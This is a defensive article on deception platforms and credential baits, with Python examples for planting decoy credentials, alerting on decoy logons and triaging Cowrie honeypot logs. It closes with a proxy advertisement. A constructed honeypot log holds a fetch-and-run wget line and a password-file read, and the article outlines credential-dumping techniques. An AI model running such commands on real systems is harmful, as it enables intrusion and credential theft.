Baits as an effective tool in detecting attacks with credential theft

Hacker attacks are a serious problem for individual users and corporate networks alike. A successful attack can plant malware on a device, steal credentials and other highly sensitive information, and cause a range of further damage. Naturally, every user wants to know how to counter this.

It is not as simple as it might seem at first glance. Most attacks today begin with social engineering: attackers forge emails, online store pages, social network accounts and even entire websites. All of it serves one goal, to get malware running on the victim's device or to make the victim "sign in" on a fake page and hand over their credentials. In other words, it is plain deception of people.

To counter such attacks, the security industry has turned the same idea against the attacker: traps and baits planted in a network to reveal illegitimate activity. The approach, known as deception technology, consists of deliberately distributing false data and fake assets across the infrastructure so as to deceive the attackers themselves and detect their presence in the network. The intruder is offered something they are almost certain to find interesting, and the moment they take it, the system flags them.

This article looks at how modern cyber deception systems (distributed deception platforms) built on traps and baits work and what distinguishes a trap from a bait. It covers the main techniques an attacker uses to find and extract credentials on a compromised host and how baits catch them, what an organization gains from deploying them, five tools that can be used to create baits, and a number of recommendations for doing the work correctly.

Traps and baits: how these methods work

The honeypot (literally "honey pot") has been used in information security for a long time. It is one of the most common types of trap: a false target meant to attract an attacker's attention. An attacker who goes after it reveals themselves and gives the security team an opportunity to take action and stop the intrusion.

The technique first appeared in the 1990s and proved its worth in practice. It has developed since, absorbing other tools and methods, and today its more advanced form, the distributed deception platform, which combines traps with baits, is in active use.

Why use false targets? Because they present the attacker with an offer that is hard to pass up, and by going after it the attacker gives themselves away. Every action is logged and handed to the security team for analysis, pattern identification and deeper investigation of the incident. This lets specialists harden the internal security system against similar attacks: the same technique, tried again, will be recognized and will not produce the desired result, so the organization is not harmed.

In theory the method is effective, but it has shortcomings that pushed specialists to improve it. The main difficulty is that each classic honeypot has to be configured individually, and it does not interact with the rest of the network. There is therefore a real chance that the attacker never notices the decoy and goes straight for real targets. Deception technology was designed to remove exactly this weakness. The result is the distributed deception platform, today one of the most advanced tools for detecting attacks on corporate networks.

Deception belongs to the class of intrusion detection systems and is designed specifically to detect attacker activity. Compared with other methods in the same class, modern baits not only reveal a penetration but also help to minimize the damage an intruder can do to the business.

In practice, a fairly large network of false objects is created that closely resembles the real infrastructure. Network processes and events are simulated, traffic is generated, users are added and removed. The only difference from a real working network is that none of these processes are real: they do not affect the operation of the production network. Moreover, legitimate users, including employees, have no reason to interact with these objects and are not given access to them. So as soon as someone starts working with a decoy, that alone indicates an intruder and an attack in progress.

Among the other distinctive features of deception technology, which can rightly be counted as its advantages, are:

  • The ability to create any kind of fake element: workstations of ordinary users, servers, and the specialized applications your business actually uses. It is also possible to emulate specialized devices such as medical equipment, smart devices, sensors and POS terminals. In this way a large network with a wide variety of traps can be built that looks as natural as possible to the intruder, who cannot easily tell whether they are looking at a real network or a decoy.
  • Use of machine learning and other modern techniques in baits. This is what makes it possible to build realistic decoys regardless of the industry the enterprise operates in or the size of its network. A financial institution, for example, can imitate banking infrastructure, including ATMs and terminals; a software company can imitate its servers and applications. Experts single this out as the key advantage of deception solutions: a convincing decoy is very hard for an attacker to distinguish from the real thing.
  • The ability to imitate not only devices and software but also data: databases, connection history, confidential documents, and sets of accounts with logins and passwords. These data baits are called "breadcrumbs". They make the fake infrastructure as realistic as possible, confuse the attacker and make them spend effort attacking the dummy. Such networks thus become a strong barrier to penetration of your real, working network.
  • Solutions based on this technology can work with or without agents, and in practice both modes can be combined. In the agent-based mode, specialized agent applications are installed on real user devices and servers to collect information about their state and at the same time emulate network activity. They can also respond to incidents and perform a number of additional tasks.
  • All decoys are managed from a single console, which also receives all reports on potential intrusions. As soon as a bait is touched, the system immediately notifies the administrator and supplies the accompanying information: which ports, protocols and addresses the intruder used, when the intrusion was detected, and more. Incidents can be handled manually or automatically, according to rules configured in advance.

These features allow us to say with confidence that properly designed and deployed baits can resist attacks at any stage of an intrusion, and especially at the beginning, when the attacker's key advantage is surprise. As soon as the attacker hits a false target and moves further into the fake infrastructure, they reveal themselves and give the security team time to respond and repel the real attack.

Features of baits

Baits, which in English-language sources are also called "breadcrumbs" or "lures", are data that attract an attacker's interest. They can be placed on company servers and on the endpoints of real users. As mentioned above, an agent can sometimes be used to notice the attacker's actions and report them. There is a significant nuance, however: an agent adds load to the infrastructure, and if the attacker detects it, they can disable it. For this reason many specialists who use the technique prefer agentless deployments.

In most cases, the following can be used as bait:

  1. Files in various formats, such as .doc or .pdf, containing deliberately false confidential information; for example, a file with a login and password for a key network system.
  2. Credentials saved in RDP sessions, browsers, LDAP directories, the operating system's credential manager and other places on the endpoint.
  3. Settings in certain systems that are deliberately misconfigured, specifically the components attackers most often look at.
  4. The command-line history of a particular user, and many other data that look entirely natural to an attacker but have no relation to reality.
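An added example (not part of the original article) of how the breadcrumbs in the list above can be generated so that each host gets its own decoy credential. The secret key, the account-name pool, the domain name and the file paths are assumptions made for the example. The design point it shows: deriving the decoy identity from the hostname with an HMAC means that the alert which later fires on the decoy username also tells you which host the attacker took it from, without keeping a mapping table.

```python
import hashlib
import hmac
from pathlib import Path
from typing import Dict, List, Optional

# Secret known only to the deception operator. Assumption: in real use it is
# loaded from a vault or environment variable; a fixed value here so the
# example runs stand-alone.
DECOY_KEY = b"replace-me-with-a-random-32-byte-secret"

# Pool of plausible service/admin account names (constructed for the example).
NAME_POOL = ["svc_backup", "svc_sqlmon", "adm_kjohnson", "svc_vmware", "adm_mpetrov"]
DOMAIN = "corp.example"  # assumed AD domain name


def decoy_username(hostname: str) -> str:
    """Derive the decoy account name for one host, deterministically.

    HMAC(key, hostname) selects a base name and a two-digit suffix, so the same
    host always receives the same breadcrumb and no lookup table has to be kept:
    who_leaked() simply recomputes the mapping over the fleet. For a large fleet
    enlarge NAME_POOL or the suffix range so that two hosts rarely collide.
    """
    digest = hmac.new(DECOY_KEY, hostname.lower().encode(), hashlib.sha256).digest()
    base = NAME_POOL[digest[0] % len(NAME_POOL)]
    suffix = int.from_bytes(digest[1:3], "big") % 100
    return f"{base}{suffix:02d}"


def decoy_password(hostname: str) -> str:
    """A plausible-looking password bound to the host; it is never a real credential."""
    digest = hmac.new(DECOY_KEY, b"pw:" + hostname.lower().encode(), hashlib.sha256).hexdigest()
    return f"Summer{digest[:6]}!"


def breadcrumbs(hostname: str) -> Dict[str, str]:
    """Artifacts to plant on one endpoint; each embeds that host's decoy identity."""
    user = decoy_username(hostname)
    pw = decoy_password(hostname)
    return {
        # a "forgotten" credentials note of the kind users leave in text files
        "Documents/backup_creds.txt": f"{DOMAIN}\\{user}\n{pw}\n",
        # a shell history line suggesting the account works on a jump host
        ".bash_history": f"sshpass -p '{pw}' ssh {user}@jump.{DOMAIN}\n",
        # an RDP connection-history entry (on Windows this lives in the registry,
        # not in a file, so write_breadcrumbs() skips it)
        "rdp_history": f"{user}@{DOMAIN};fs01.{DOMAIN}",
    }


def who_leaked(observed_username: str, fleet: List[str]) -> Optional[str]:
    """Map a decoy username seen in an auth log back to the host it was planted on."""
    wanted = observed_username.lower()
    for host in fleet:
        if decoy_username(host) == wanted:
            return host
    return None


def write_breadcrumbs(hostname: str, root: Path) -> List[Path]:
    """Write the file-type breadcrumbs for hostname under root (e.g. a user profile)."""
    written = []
    for rel, content in breadcrumbs(hostname).items():
        if rel == "rdp_history":
            continue
        path = root / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(content)
        written.append(path)
    return written


if __name__ == "__main__":
    import tempfile

    fleet = ["srv-db01", "ws-0042", "ws-0043"]
    for host in fleet:
        print(host, "->", decoy_username(host))
    with tempfile.TemporaryDirectory() as tmp:
        for p in write_breadcrumbs("ws-0042", Path(tmp)):
            print("planted", p.relative_to(tmp))
    # later, an auth log shows the decoy account being used:
    print("leaked from:", who_leaked(decoy_username("srv-db01"), fleet))
```

The decoy accounts must also exist (disabled or heavily restricted) in the directory and be audited, otherwise a logon attempt with them produces no event to alert on; the bash history line assumes a Linux or jump-host context, and the password format is only meant to look like something a user would pick.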

It bears repeating that baits play a very important role in today's cyber deception systems, because most attacks target end-user devices directly. Once an attacker gains initial access to the corporate network, their attention turns to finding artifacts and other information that will let them establish a foothold on the compromised host and then escalate their privileges. That information is mainly logins and passwords and user accounts with varying access rights.

Privilege escalation can be horizontal or vertical. In the first case, the attacker takes over other accounts at a similar privilege level (lateral movement) and uses them to reach further into the system. In the second case, the attacker starts from a compromised regular user account and tries to obtain root or administrative rights.

Whichever route the attacker takes, there is a high probability that they will fall for the bait, reveal themselves, and as a result not obtain the access they want to the real network.

Techniques for finding and extracting credentials on a compromised host

Detecting attacks with baits is a way to stop the intruder, lead them into a dead end and keep them from taking the next step, the one that would target real data rather than false information. For this to work in practice, every action of the intruder must be studied carefully, and you must think about which nodes and elements will draw their attention. The following techniques and tools are typically used:

  • Credential dumping from the process memory of lsass.exe (Local Security Authority Subsystem Service), which on Windows holds the credentials of all users with an active logon session on the host.
  • Searching files and services for logins and passwords. Users often keep account details in instant messengers, email correspondence, plain text files, and so on.
  • Extracting valid credentials from memory in the form of Kerberos tickets, plaintext passwords, NTLM hashes and other material. Well-known utilities such as Mimikatz are detected even by classic antivirus products, as well as EDR and XDR solutions, so attackers often run recompiled or obfuscated forks with the same functionality, modifying them each time to evade signatures.
  • Stealing NTLM password hashes directly from the Security Accounts Manager (SAM) database on the local disk, and from the Windows Credential Manager.
  • Searching for certificates and VPN profiles that allow connections to hosts running Windows and Linux.
  • Abusing the Kerberos protocol, which underpins authentication and access requests to internal services and applications and provides single sign-on to shared resources in the corporate network. In Kerberoasting, an authenticated attacker requests service tickets for accounts registered with a service principal name (SPN) and cracks them offline to recover the service account's password.
  • Searching cron or systemd scheduler entries and the bash history for information useful in planning the next steps of the attack.

So when baits are in place, the attacker's next move can be prevented. They are likely to find the decoys and try to use them, without suspecting that they have effectively stepped on a mine. At the same time, the baits are invisible to ordinary users and do not affect their work in any way.
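An added example (not from the original article) of the detection side of what the list above describes, for the simplest bait mentioned later in the article: a decoy account planted in Active Directory with logon auditing switched on. The analysis runs over Windows Security events and alerts whenever a decoy account appears, including the Kerberoasting pattern (a service ticket for a decoy SPN requested with RC4). The account names, the maintenance host that keeps the decoys' last-logon timestamps fresh, and the sample events are all constructed assumptions, not real logs.

```python
import ipaddress
from dataclasses import dataclass
from typing import Iterable, List

# Decoy accounts planted in Active Directory (assumption: names are illustrative).
DECOY_ACCOUNTS = {"svc_backup17", "svc_sqlmon03"}

# The deception server logs on with the decoys on a schedule so that lastLogon
# looks fresh; that traffic is expected and must not raise an alert (assumption).
MAINTENANCE_SOURCE = ipaddress.ip_address("10.10.0.5")

# Kerberos encryption types that mark a ticket request worth cracking offline
# (RC4-HMAC variants); AES requests (0x11/0x12) are the normal modern default.
RC4_ETYPES = {"0x17", "0x18"}


@dataclass
class Alert:
    event_id: int
    account: str
    source_ip: str
    reason: str


def _norm(name: str) -> str:
    """'CORP\\svc_backup17' or 'svc_backup17@CORP.EXAMPLE' -> 'svc_backup17'."""
    name = name.rsplit("\\", 1)[-1]
    name = name.split("@", 1)[0]
    return name.lower()


def _source(ev: dict) -> str:
    """IpAddress as logged; strip the IPv4-mapped prefix Windows often adds."""
    src = str(ev.get("IpAddress", "-"))
    return src[7:] if src.startswith("::ffff:") else src


def _is_maintenance(src: str) -> bool:
    try:
        return ipaddress.ip_address(src) == MAINTENANCE_SOURCE
    except ValueError:
        return False


def analyze(events: Iterable[dict]) -> List[Alert]:
    """Raise an alert for every event in which a decoy account appears.

    Events are dicts keyed by the EventData field names of the Windows
    Security log (as a log shipper such as Winlogbeat exports them).
    """
    alerts: List[Alert] = []
    for ev in events:
        eid = int(ev.get("EventID", 0))
        src = _source(ev)
        if _is_maintenance(src):
            continue
        target = _norm(str(ev.get("TargetUserName", "")))

        if eid in (4624, 4625, 4768) and target in DECOY_ACCOUNTS:
            reason = {
                4624: "successful logon with decoy credentials",
                4625: "failed logon attempt against decoy account",
                4768: "Kerberos TGT requested for decoy account",
            }[eid]
            alerts.append(Alert(eid, target, src, reason))

        elif eid == 4769:
            # For a service ticket request the decoy is the *service* account;
            # TargetUserName is whoever asked for the ticket.
            service = _norm(str(ev.get("ServiceName", "")))
            if service in DECOY_ACCOUNTS:
                etype = str(ev.get("TicketEncryptionType", "")).lower()
                if etype in RC4_ETYPES:
                    reason = f"RC4 service ticket for decoy SPN requested by {target} (Kerberoasting pattern)"
                else:
                    reason = f"service ticket for decoy SPN requested by {target}"
                alerts.append(Alert(eid, service, src, reason))
    return alerts


# Constructed sample events (not real logs): one normal logon, one maintenance
# logon, one failed logon against a decoy, one RC4 TGS request for a decoy SPN,
# and one ordinary AES TGS request for a real file server.
SAMPLE_EVENTS = [
    {"EventID": 4624, "TargetUserName": "jsmith", "IpAddress": "10.10.4.21"},
    {"EventID": 4624, "TargetUserName": "svc_backup17", "IpAddress": "10.10.0.5"},
    {"EventID": 4625, "TargetUserName": "CORP\\svc_backup17", "IpAddress": "::ffff:10.10.4.77"},
    {"EventID": 4769, "TargetUserName": "jsmith@CORP.EXAMPLE", "ServiceName": "svc_sqlmon03",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.4.77"},
    {"EventID": 4769, "TargetUserName": "jsmith@CORP.EXAMPLE", "ServiceName": "fs01$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.4.21"},
]


if __name__ == "__main__":
    for a in analyze(SAMPLE_EVENTS):
        print(f"[{a.event_id}] {a.account} from {a.source_ip}: {a.reason}")
```

Two details matter in practice: the maintenance exception must be as narrow as possible (one source, one schedule), because an attacker who lands on that host inherits its silence; and a decoy SPN account only attracts Kerberoasting if it looks like a real service account, so give it a plausible SPN and description rather than an empty one.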

What using baits delivers in practice

The first thing an organization gets from deploying deception in its corporate network is a high level of protection against intrusion and malware combined with prompt detection of attacks. In practice such systems are very hard to bypass, because the attacker does not realize until the end that they are dealing with a bait rather than a real network or user device. Moreover, false positives are rare, unlike with many other security systems: legitimate users have no reason to touch a decoy, so almost any interaction with one is an attack. Your security specialists therefore do not waste time and effort; they know a hacking attempt is under way and can react immediately.

If desired, deception technology can be integrated with the other security systems in your corporate environment without fear of software or hardware conflicts, making protection of the local network even stronger and more reliable.

An additional benefit for the business is that intruder activity can be identified and stopped at an early stage. Most intruders do not take drastic action at this point: they collect information, get to know the network and perform other actions that do not yet cause serious damage or compromise the real infrastructure. This is why the technology has found such wide application. Many experts consider it one of the most reliable and effective means of countering attacks aimed at stealing confidential information and user credentials; it can also help against ransomware.

Deployment and subsequent maintenance are fairly simple. No additional physical equipment is needed, which keeps costs down: the systems are installed as software and then configured for the specifics of a particular network. In operation they require minimal hardware resources, so they do not affect device performance.

Conveniently, you can deploy the product in your network and test it before committing. This shows how it works in your infrastructure and lets you evaluate its effectiveness before making a purchasing decision.

Deception solutions are also highly automated, which significantly reduces the workload on specialists. You configure the tool centrally once, then simply respond promptly to the notifications the decoy system generates and take measures against the intruders.

Tools and methods for creating baits

Among all the tools specialists use to create baits, the simplest option is to create fake accounts, for example in Active Directory. Bear in mind, however, that such accounts protect only that service: you enable auditing and track every attempt to authenticate with them. For a broader security system, specialized tools can be used. The choice is wide, and alongside paid products there are free ones. Here are just a few of the most common options:

  1. CanaryTokens. An extremely popular open source project, maintained by Thinkst, for creating different types of baits within an infrastructure. Through the web console you can create a trigger in the form of a .doc or .pdf document, a DNS name, a URL, an email address, a QR code for physical or network infrastructure, a MySQL dump, an operating system command, or an application, including ones for iOS and Android devices. Such tokens are placed on users' working hosts, in databases, project management systems, CI/CD pipelines, code repositories, and so on. When a token is triggered, a notification is sent to the email address you specified during setup, always including the token name, a timestamp and the IP address of the device that triggered it. Note, however, that there is no built-in telemetry collection and no central management of all the baits.
  2. Cowrie. A popular open source SSH/Telnet honeypot. It emulates vulnerable or misconfigured SSH services and a file system containing realistic-looking files and directories; this fake file system can be shaped to resemble a real one in the context of a particular organization. The system records the attacker's actions, including commands executed, file manipulation and login attempts. Notifications can be sent by email or to messengers depending on the configuration. Cowrie interacts with the attacker using pre-defined fake output, commands and responses, which makes the environment look natural and keeps the attacker from becoming suspicious. It supports SSH, SCP, SFTP and Telnet.
  3. Honeyd. A low-interaction product that can simulate the network behaviour of various operating systems, spoof SSH banners and respond to simple commands. It can launch a large number of virtual hosts on the network, with the caveat that they will share the same MAC address. It not only detects an intruder's actions but collects a substantial set of information about them, in particular login attempts, the commands entered and the IP address of their device. You may not get a complete picture of the attacker's intent, but you will have the basic information. It supports protocols such as SSH, HTTPS, FTP, Telnet and SMTP.
  4. DejaVU. One of the first open source deception platforms on the market. It allows you to create baits that are installed on real user hosts and company servers. The boxed version supports only a limited number of decoy types. Decoys can be deployed not only on the internal network but also in the cloud. It contains a number of advanced decoys and breadcrumbs and can deploy multiple server and client decoys on different VLANs. For convenient and flexible management it provides a web platform through which all decoys are administered and configured from a centralized console; you can also configure how alerts are displayed and processed and apply other settings specific to your network. Alerts are raised only when an attacker interacts with a decoy. One of its most significant advantages is that a single platform deploys even a complex decoy network, which simplifies management and increases control.
  5. Dionaea. A product that detects malware by luring the attacker into traps and capturing the payloads they deliver, which can then be examined in an isolated environment using the built-in library. From the collected information you can build a detailed picture of the malware used in the attack. It records the location and IP address of the remote host, the credentials used to connect, the time and frequency of the attempts, and the list of files downloaded or uploaded. Messages to security specialists can be sent in different formats depending on the configuration. It supports a large number of protocols, including SMB, HTTPS, MSSQL, MySQL, TFTP, Blackhole, SIP, NTP and more.
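An added example (not from the article or from the Cowrie project) of what to do with the records an SSH honeypot like Cowrie produces once an attacker has been lured in: its JSON log is grouped by session so that the login attempts, commands and downloads of one intruder can be reviewed as a single story, and a coarse triage label is attached. The sample log lines are constructed in the shape of Cowrie's JSON output (documentation-range IP addresses, an invented hash); they are not a real capture, and the field names are assumed to match Cowrie's jsonlog output.

```python
import json
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed sample lines (not a real capture) in the shape of Cowrie's JSON
# log: one session that brute-forces, gets in and drops a payload, and one
# that only fails a login. Addresses are from 203.0.113.0/24 (documentation).
SAMPLE_LOG = """
{"eventid":"cowrie.session.connect","src_ip":"203.0.113.9","src_port":51312,"dst_port":2222,"session":"a1b2c3d4e5f6","timestamp":"2024-05-01T10:00:00.000000Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"admin","src_ip":"203.0.113.9","session":"a1b2c3d4e5f6","timestamp":"2024-05-01T10:00:01.100000Z"}
{"eventid":"cowrie.login.success","username":"root","password":"123456","src_ip":"203.0.113.9","session":"a1b2c3d4e5f6","timestamp":"2024-05-01T10:00:02.300000Z"}
{"eventid":"cowrie.command.input","input":"cat /etc/passwd","src_ip":"203.0.113.9","session":"a1b2c3d4e5f6","timestamp":"2024-05-01T10:00:05.000000Z"}
{"eventid":"cowrie.command.input","input":"uname -a","src_ip":"203.0.113.9","session":"a1b2c3d4e5f6","timestamp":"2024-05-01T10:00:06.000000Z"}
{"eventid":"cowrie.command.input","input":"wget http://203.0.113.50/x.sh -O /tmp/x.sh; sh /tmp/x.sh","src_ip":"203.0.113.9","session":"a1b2c3d4e5f6","timestamp":"2024-05-01T10:00:09.000000Z"}
{"eventid":"cowrie.session.file_download","url":"http://203.0.113.50/x.sh","outfile":"var/lib/cowrie/downloads/deadbeefdeadbeef","shasum":"deadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef","src_ip":"203.0.113.9","session":"a1b2c3d4e5f6","timestamp":"2024-05-01T10:00:10.000000Z"}
{"eventid":"cowrie.session.closed","duration":42.5,"src_ip":"203.0.113.9","session":"a1b2c3d4e5f6","timestamp":"2024-05-01T10:00:42.500000Z"}
{"eventid":"cowrie.session.connect","src_ip":"203.0.113.77","src_port":40001,"dst_port":2222,"session":"0f0f0f0f0f0f","timestamp":"2024-05-01T11:00:00.000000Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","src_ip":"203.0.113.77","session":"0f0f0f0f0f0f","timestamp":"2024-05-01T11:00:01.000000Z"}
{"eventid":"cowrie.session.closed","duration":1.2,"src_ip":"203.0.113.77","session":"0f0f0f0f0f0f","timestamp":"2024-05-01T11:00:01.200000Z"}
"""


@dataclass
class Session:
    session_id: str
    src_ip: str
    failed_logins: List[Tuple[str, str]] = field(default_factory=list)
    successful_login: Optional[Tuple[str, str]] = None
    commands: List[str] = field(default_factory=list)
    downloads: List[Dict[str, str]] = field(default_factory=list)
    duration: Optional[float] = None


def parse_sessions(log_text: str) -> Dict[str, Session]:
    """Group Cowrie JSON events by session id and rebuild what each attacker did."""
    sessions: Dict[str, Session] = {}
    for line in log_text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue  # tolerate a truncated line at the end of a rotating log
        sid = ev.get("session")
        if not sid:
            continue
        s = sessions.setdefault(sid, Session(sid, ev.get("src_ip", "?")))
        kind = ev.get("eventid")
        if kind == "cowrie.login.failed":
            s.failed_logins.append((ev.get("username", ""), ev.get("password", "")))
        elif kind == "cowrie.login.success":
            s.successful_login = (ev.get("username", ""), ev.get("password", ""))
        elif kind == "cowrie.command.input":
            s.commands.append(ev.get("input", ""))
        elif kind == "cowrie.session.file_download":
            s.downloads.append({"url": ev.get("url", ""), "shasum": ev.get("shasum", "")})
        elif kind == "cowrie.session.closed":
            s.duration = ev.get("duration")
    return sessions


# Substrings that usually mean the attacker is staging a payload, not just looking.
PAYLOAD_HINTS = ("wget ", "curl ", "tftp ", "chmod +x", "/tmp/")


def triage(s: Session) -> str:
    """Coarse severity: did the attacker get in, and did they try to drop a payload?"""
    if s.successful_login is None:
        return "brute-force-only"
    if s.downloads or any(h in c for c in s.commands for h in PAYLOAD_HINTS):
        return "payload-delivery"
    if s.commands:
        return "interactive-recon"
    return "login-only"


if __name__ == "__main__":
    for sid, s in parse_sessions(SAMPLE_LOG).items():
        print(f"{sid} {s.src_ip} {triage(s)}: {len(s.failed_logins)} failed, "
              f"login={s.successful_login}, {len(s.commands)} cmds, "
              f"{len(s.downloads)} downloads, {s.duration}s")
```

The credential pairs the attacker tried are worth keeping: if one of them matches a breadcrumb you planted elsewhere, the honeypot session tells you where that bait was picked up, and the download hashes feed directly into blocklists or a sandbox of the kind Dionaea provides.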

But is implementing baits as simple as it seems at first glance? Not quite, but the drawbacks can be minimized if you know a few nuances.

Nuances of implementing baits that you need to know

For your baits to work as effectively as possible, and for you to be confident that your credentials are well protected, the work must be done correctly, following the recommendations of specialists. The easiest way to set up baits is with virtual machines. This is ideal when you need a large network containing many traps: a chain of virtual machines can run on a single physical device, so maintenance costs are minimized and there is no need to buy expensive hardware, with the same result.

When working with baits, you should also keep the following in mind:

  • Before deploying a server image, create a backup copy of it so that recovery is straightforward if the need arises.
  • Pay serious attention to configuring the bait and entrust this work to specialists; otherwise an attacker may exploit real vulnerabilities in it to penetrate other systems on your network or to launch attacks on third-party networks, including other organizations, over the Internet.
  • Make sure the honeypots you create are not used by your staff. No one should have access to them except the administrators directly responsible for them. This is the only way to keep the local network secure without disrupting normal work.
  • Beware of another kind of false alarm. We said above that honeypots rarely produce false positives, but there have been cases where attackers deliberately triggered a honeypot as a diversion. The system flagged the activity and specialists spent time investigating it while the attackers carried out the real attack elsewhere.
  • Monitor the deception system in real time, so that you can cut the attacker's connection if you see a risk to your real local network.

You will also need to audit your own file system. Set priorities correctly and create an accessible file share containing information that looks valuable but has nothing to do with genuine data.

Summing up

To counter hacker attacks and the launch of malicious software, the IT market offers a wide variety of tools. One of the most effective is cyber deception, based on baits for intruders. We have described in detail what it is and what advantages it offers for local networks. It remains for you to analyze this information and draw your own informed conclusions.

Separately, note that the likelihood of unauthorized access is reduced when the real IP address of a user device is hidden from the services it connects to, since an attacker cannot target an address they cannot see. One way to do this is with mobile proxies from the MobileProxy.Space service. They hide not only the IP address but also the geolocation of your device, which helps to maintain confidentiality. They can also be used to bypass regional restrictions and access blocked services and sites, run multiple accounts, scrape the web and automate routine, repetitive processes, without the risk of being banned or blocked. A proxy does not, however, replace the endpoint and network controls discussed above: it conceals your address, it does not stop malware that reaches the device by other means.

At https://mobileproxy.space/en/user.html?buyproxy you can learn more about mobile proxies, review the tariffs and see the available GEOs. There is also a free 2-hour trial before purchase. Take advantage of it to see how advanced the solution at your disposal can be.
